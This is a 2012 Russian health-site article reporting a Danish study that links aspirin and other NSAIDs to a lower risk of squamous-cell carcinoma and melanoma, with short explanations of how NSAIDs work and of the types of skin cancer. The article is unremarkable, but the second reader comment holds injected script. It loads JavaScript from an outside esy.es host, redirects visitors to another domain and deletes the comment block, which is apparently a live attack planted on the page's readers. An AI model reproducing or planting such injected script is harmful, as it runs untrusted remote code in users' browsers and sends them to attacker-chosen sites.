Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Если вы грамотно лечите г...  >>  Если вы грамотно лечите грипп, вы защищаете себя от рака кожи
 
Обратная связь
 

Если вы грамотно лечите грипп, вы защищаете себя от рака кожи

Размер шрифта
05 июля 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Согласно данным нового исследования, аспирин и другие препараты, обладающие жаропонижающим и обезболивающим действием, снижают риск развития рака кожи.


Что такое аспирин

Аспирин, а также ибупрофен, диклофенак, индометацин относятся к группе нестероидных противовоспалительных средств (НПВС), которые обладают обезболивающим, жаропонижающим и противовоспалительным эффектами, т.е. устраняют боль, снижают температуру и уменьшают воспаление.

Главное в механизме действия НПВС – способность подавлять активность фермента циклооксигеназы. Этот фермент ускоряет превращение  арахидоновой кислоты в простагландины.

Простагландины накапливаются в очаге воспаления и приводят к появлению характерных признаков:

  • покраснения, отека и боли;
  • повышают чувствительность рецепторов боли к определенным веществам (гистамину, брадикинину) и механическим воздействиям;
  • увеличивают чувствительность центров терморегуляции к действию веществ, вызывающих повышение температуры.

Блокируя активность циклооксигеназы, НПВС препятствуют образованию простагландинов, что приводит к уменьшению боли и воспаления, а также снижению температуры.

Что такое рак кожи

К раку кожи обычно относят следующие виды злокачественных опухолей кожи:

  • базально-клеточную карциному, развивающуюся из базальных клеток кожного эпителия;
  • сквамозно-клеточную карциному, или плоскоклеточный рак;
  • меланому.

Самой агрессивной формой рака кожи является меланома. Ее опасность заключается в том, что даже небольшие опухоли дают метастазы во все органы и ткани. Процесс метастазирования представляет собой распространение опухолевых клеток по лимфатическим и кровеносным сосудам. Попадая в здоровые органы и ткани, опухолевые клетки начинают размножаться, что значительно затрудняет лечение и ухудшает прогноз.

Основным фактором риска развития рака кожи является ультрафиолетовое излучение.

 

Суть исследования

Датские ученые проанализировали истории болезни с 1991 по 2009 гг. и выявили 1 974 случая сквамозно-клеточной карциномы, 13 316 случаев базально-клеточной карциномы  и 3 242 случая меланомы. Затем они сравнили данные пациентов, которым был поставлен диагноз рак кожи, с данными пациентов, не страдающих этим заболеванием.

Результаты исследования

Оказалось, что НПВС снижают риск развития сквамозно-клеточной карциномы на 15%, а меланомы – на 13%.

Что касается базально-клеточной карциномы, то прием НПВС не оказывал существенного влияния на ее развитие. Тем не менее, если пациент принимал препараты в течение длительного времени или в большой дозе, то они снижали риск развития базально-клеточной карциномы на 15% на всех участках тела, кроме головы и шеи.

Полученные данные открывают перспективы для дальнейшего изучения НПВС в качестве средств профилактики рака кожи.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

24 ноября 2014 в 14:53

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 23:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Диагностика и лечение с помощью света   Созданы лекарства, которые обучают организм убивать рак. Это победа!   Специализированное питание как важный фактор лечения и реабилитации пациентов с онкологическими заболеваниями   Вирус простуды убивает раковые клетки  
06 февраля 2013Технология разведения коров позволяет определить риск развития рака 18 октября 2012Новый тест скажет, будет у вас рак или нет
 
09 августа 2012Раковые клетки теперь не смогут скрыться! 03 июля 2012Созданы лекарства, которые обучают организм убивать рак
 

Слайдшоу

1
Самая лучшая еда для похудения, сердца и против рака
Факторы, которые влияют на возникновение рака
Быстроразвивающиеся виды рака. Часть 1

Тесты

1
Средства личной гигиены
Что скрывает ваша моча?
Грозит ли вам инфаркт миокарда?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.